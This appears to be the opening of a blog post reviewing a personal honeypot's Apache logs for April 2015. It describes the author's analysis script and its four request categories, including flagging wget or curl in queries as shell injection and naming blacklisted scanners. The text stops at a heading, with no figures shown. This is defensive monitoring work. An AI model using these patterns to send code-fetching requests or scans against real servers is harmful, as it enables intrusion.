This is the monthly review of my Honeypot for April 2015. It is based on data taken from Apache log files. The tool used to optimize the data is mypyfwa.py which is part of the MyPythonApacheFirewall, a project I started on github some time ago.
In the current state, the analyze script extracts requests based on four different types
- PATH: this describes the usage of more than three „/“ in the request
- SCANNER: describes that one of the blacklisted scanners is used (Zeus, masscan, etc)
- SHELLinjection: describes that wget or curl was used within the query
- SQLinjection: describes that a string including SQL syntax was use
Attacker by Countrycode